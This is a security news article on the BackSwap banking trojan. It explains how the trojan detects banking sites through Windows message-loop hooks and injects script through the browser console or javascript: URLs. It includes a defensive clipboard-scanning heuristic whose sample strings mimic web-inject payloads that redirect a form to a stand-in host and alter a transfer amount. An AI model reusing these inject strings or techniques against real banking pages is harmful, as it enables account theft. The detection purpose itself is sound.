BackSwap Banking Trojan uses New Techniques to Steal Money from your Account

ESET security researchers have spotted a new banking malware named BackSwap Trojan which can bypass antivirus software detection and security protection implemented in browsers.

The BackSwap Trojan uses never-before-seen techniques to steal money from customers, instead of complex code injection methods.

“We have discovered a new banking malware family that uses an innovative technique to manipulate the browser: instead of using complex process injection methods to monitor browsing activity, the malware hooks key window message loop events in order to inspect values of the window objects for banking activity.”

Once the user accesses the bank account, the malware injects malicious code into the web page by using the browser’s JavaScript console or directly through the address bar.

The BackSwap Trojan uses three new techniques, none of which tamper with the browser processes.

The first technique is used to detect when the user is accessing a bank-related website. For this, BackSwap uses a Windows mechanism called the ‘message loop’, an obligatory part of the code of every program with a graphical interface on Microsoft Windows.

“The malware monitors the URL currently being visited by installing event hooks for a specific range of relevant events available through the Windows message loop, such as EVENT_OBJECT_FOCUS, EVENT_OBJECT_SELECTION, EVENT_OBJECT_NAMECHANGE and a few others. The hook will look for URL patterns by searching the objects for strings starting with “https” retrieved by calling the get_accValue method from the event’s IAccessible interface,” says the report published by ESET.

The malware looks into the Windows message loop for bank-specific URLs or any terms related to the banking website.

Once a match is detected, the malware uses one of the techniques below to load the malicious script for the corresponding bank from its resources.

In the first technique, the malware inserts the malicious script into the clipboard and simulates pressing the key combination for opening the developer’s console (CTRL+SHIFT+J in Google Chrome, CTRL+SHIFT+K in Mozilla Firefox).

After that, the malware simulates CTRL+V, which pastes the content of the clipboard and then sends ENTER to execute the contents of the console.

The malware then sends the console key combination again to close the console; the browser window is made invisible during this process. As the entire attack takes under a second to execute, the user will find it hard to tell that anything went wrong.

In the second technique, instead of interacting with the developer’s console, the malicious script is executed directly from the address bar via a javascript: protocol URL.

“The malware simply simulates pressing CTRL+L to select the address bar followed by the DELETE key to clear the field, then “types” in “javascript:” by calling SendMessageA in a loop, and then pastes the malicious script with the CTRL+V combination. It then executes the script by sending the ENTER key. At the end of the process, the address bar is cleared to remove any signs of compromise.”
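Both delivery techniques described above rely on the clipboard carrying the script that is pasted into the console or the address bar. The following added example (not from the ESET report or the BackSwap sample) sketches a defender-side heuristic that scores clipboard contents for signs of a pasted DOM-manipulating script; the sample strings, patterns and thresholds are constructed for illustration, and hooking a live clipboard on Windows is left to the reader.

```python
import re

# Constructed samples standing in for clipboard contents seen on an endpoint.
# These are illustrative strings, not captured BackSwap payloads.
SAMPLES = {
    "address_bar_payload": "javascript:(function(){var f=document.forms[0];"
                           "f.action='https://example.invalid/x';})();",
    "console_payload": "var el=document.querySelector('#amount');"
                       "if(el){el.value='1000';}document.forms[0].submit();",
    "ordinary_text": "Please find attached the invoice for May 2018.",
    "url_only": "https://www.example.com/login",
}

# Indicator 1: a javascript: URL, the address-bar delivery vector.
JS_PROTOCOL = re.compile(r"^\s*javascript:", re.IGNORECASE)
# Indicator 2: DOM access typical of a web-inject that rewrites a form.
DOM_API = re.compile(r"\b(document|window)\.(forms|querySelector|"
                     r"getElementById|cookie|location)\b")
# Indicator 3: submitting a form or sending data out of the page.
SUBMIT_OR_XHR = re.compile(r"\.(submit|send)\(|XMLHttpRequest|fetch\(")


def score_clipboard(text: str) -> int:
    """Heuristic score: higher means the text looks like an injected script."""
    score = 0
    if JS_PROTOCOL.search(text):
        score += 3
    if DOM_API.search(text):
        score += 2
    if SUBMIT_OR_XHR.search(text):
        score += 2
    # Long single-line blobs are typical of minified, paste-ready scripts.
    if "\n" not in text.strip() and len(text) > 120:
        score += 1
    return score


def classify(text: str) -> str:
    """Map the score to a triage label (thresholds are assumptions)."""
    score = score_clipboard(text)
    if score >= 4:
        return "suspicious"
    if score >= 2:
        return "review"
    return "benign"


if __name__ == "__main__":
    for name, content in SAMPLES.items():
        print(f"{name}: {classify(content)} (score {score_clipboard(content)})")
```

Such a check is only one signal; the same heuristic would also fire on a developer legitimately pasting a bookmarklet, so it belongs alongside process and keystroke telemetry rather than as a standalone verdict.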

The latest version of BackSwap malware supports the attack against Mozilla Firefox, Google Chrome, and Internet Explorer.

Researchers also said that the current version of the BackSwap Trojan carries malicious scripts targeting only five Polish banks: PKO Bank Polski, Bank Zachodni WBK S.A., mBank, ING and Pekao.


ASHIQUE SAJJAD

Ashique is a self-motivated and passionate security analyst with good knowledge of computer networking, security analysis, vulnerability assessment and penetration testing.
